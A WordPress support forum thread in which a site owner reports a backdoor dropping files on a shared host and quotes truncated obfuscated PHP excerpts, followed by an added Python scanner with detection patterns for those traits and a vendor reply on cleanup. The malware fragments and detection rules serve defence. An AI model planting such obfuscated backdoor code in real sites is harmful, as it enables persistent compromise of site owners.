Title: backdoor host
Last modified: July 15, 2021

---

# backdoor host

 *  Resolved [duboi](https://wordpress.org/support/users/duboi/)
 * (@duboi)
 * [4 years, 11 months ago](https://wordpress.org/support/topic/backdoor-host/)
 * Hello,
 * I have a backdoor that injects files in the root of the shared server, where there
   is no WordPress installed directly.
   I delete them regularly, I analyze the
   WordPress plugins of my sites, and I installed a monitor plugin for the changes
   on the FTP server of the sites. Apparently I have to do it for each site, and
   then maybe I have to install a site at the root to see how it starts?
 * Just if you have some info on scripts or an idea to stop this.
   The attacker creates 4 files each time, thanks.
 * admin.php
    extract of the code: `<?php if (!function_exists('hex2bin')) { function hex2bin($JKiuL) { $Jl4hU = strlen($JKiuL); $Pycm9 = ""; $jV1U7 = 0; while ($jV1U7 < $Jl4hU) { $fDGwd =`
 * fox-style.php
    code excerpt: `<?php if (!function_exists('hex2bin')) { function hex2bin($JKiuL) { $Jl4hU = strlen($JKiuL); $Pycm9 = ""; $jV1U7 = 0; while ($jV1U7 < $Jl4hU) { $fDGwd =`
 * index.php
    extract from the code: `<?php goto t5YxR; t5YxR: function vPFWr($KPBxi){ goto b6wCq; SJCmP: return $KPBxi; goto fSf_U; Q2Oje: $KPBxi = substr($KPBxi, (int) wiNPsmNlGPpvYAW8vkEagLZs0xEQF9Id0Zxcy3N8yyv4O3BNi8867z6KCOeU3gdBhGXpXm0PoGxaVif09Svu8wjnWvubjfr3sCZUpfhnA7f1tvCx0JAoDNo`
 * reads.hlm
    `get_results( "SELECT ID FROM $wpdb->users ORDER BY ID ASC" ); $authorId = 0; $firstUserId = 0; if( $users ) { foreach ( $users as $user ) { if($firstUserId == 0){ $firstUserId = $user->ID; } $wp_user =`
 * Translated with [http://www.DeepL.com/Translator](http://www.DeepL.com/Translator)
   (free version)
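
The obfuscation traits visible in the excerpts above (a `hex2bin` polyfill, `goto` label chains, random five-character variable names, and PHP code in a file without a PHP extension) can drive a quick triage scan of a web root. This is an added example, not part of the original thread and not Wordfence's code; the rule names, thresholds, extension list and sample files are assumptions constructed from the excerpts.

```python
import re
import tempfile
from pathlib import Path

# Heuristics modelled on the excerpts in the post (assumptions, not vendor signatures).
# rule name -> (pattern, minimum number of distinct matches before the rule fires)
RULES = {
    "hex2bin-polyfill": (re.compile(r"function_exists\(\s*['\"]hex2bin"), 1),
    "goto-spaghetti": (re.compile(r"\bgoto\s+\w+\s*;"), 3),
    "random-5char-vars": (re.compile(r"\$(?=\w*[a-z])(?=\w*[A-Z])\w{5}\b"), 3),
}
PHP_MARKER = re.compile(r"<\?\s*php|\$wpdb->")
PHP_EXTENSIONS = {".php", ".phtml", ".inc"}

# Constructed sample files: inert fragments shaped like the excerpts, plus one clean file.
SAMPLES = {
    "admin.php": "<?php if (!function_exists('hex2bin')) { function hex2bin($JKiuL) "
                 "{ $Jl4hU = strlen($JKiuL); $Pycm9 = \"\"; $jV1U7 = 0; } }",
    "index.php": "<?php goto t5YxR; t5YxR: function vPFWr($KPBxi){ goto b6wCq; "
                 "SJCmP: return $KPBxi; goto fSf_U; }",
    "reads.hlm": "get_results( \"SELECT ID FROM $wpdb->users ORDER BY ID ASC\" );",
    "settings.php": "<?php $table_prefix = 'wp_'; require_once 'wp-settings.php';",
}

def scan_text(name, text):
    """Return the sorted names of the rules that fire for one file."""
    hits = [rule for rule, (rx, minimum) in RULES.items()
            if len(set(rx.findall(text))) >= minimum]
    # PHP code under a non-PHP extension (such as reads.hlm) is its own signal.
    if Path(name).suffix.lower() not in PHP_EXTENSIONS and PHP_MARKER.search(text):
        hits.append("php-in-non-php-file")
    return sorted(hits)

def scan_tree(root, max_bytes=262144):
    """Walk a directory and map relative path -> fired rules (flagged files only)."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            with path.open("rb") as fh:  # read a bounded prefix; binaries decode harmlessly
                text = fh.read(max_bytes).decode("utf-8", errors="replace")
            hits = scan_text(path.name, text)
            if hits:
                findings[str(path.relative_to(root))] = hits
    return findings

def demo():
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLES.items():
            Path(root, name).write_text(body, encoding="utf-8")
        return scan_tree(root)
```

Pointing `scan_tree()` at the shared account's document root lists candidate files for manual review; a hit is a reason to inspect a file, not proof that it is malicious.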

Viewing 1 replies (of 1 total)

 *  [WFSupport](https://wordpress.org/support/users/wfsupport/)
 * (@wfsupport)
 * [4 years, 11 months ago](https://wordpress.org/support/topic/backdoor-host/#post-14668672)
 * You can use Wordfence free to clean your site. There is [a guide available here](https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/)
   that can help walk you through the process.
 * Make sure and get all your plugins and themes updated and update WordPress core
   too. If you are on an older branch (WordPress 4.x etc) because you wanted to 
   wait before installing the latest version because of Gutenberg or a custom theme
   compatibility you still need the latest update in that version. Those can be 
   found here:
    [https://wordpress.org/download/releases/](https://wordpress.org/download/releases/)
   WordPress sometimes even patches their older releases if a vulnerability
   was found, so make sure to update your version if needed.
 * As a rule, any time I think someone’s site has been compromised I also tell them
   to update their passwords for their hosting control panel, FTP, WordPress admin
   users, and database. Because of what I told you at the start of this message,
   this is very important to do.
 * Additionally you might find the WordPress Malware Removal section in our free
   Learning Center helpful.
    [https://www.wordfence.com/learn/](https://www.wordfence.com/learn/)
 * If you are unable to clean this on your own there are paid services that will
   do it for you. Wordfence offers such a service for this. Regardless if you choose
   to clean it yourself or let someone else do so, we recommend that you make a 
   full backup of the site beforehand.
 * I hope this helps.
 * Tim


The topic ‘backdoor host’ is closed to new replies.


 * 1 reply
 * 2 participants
 * Last reply from: [WFSupport](https://wordpress.org/support/users/wfsupport/)
 * Last activity: [4 years, 11 months ago](https://wordpress.org/support/topic/backdoor-host/#post-14668672)
 * Status: resolved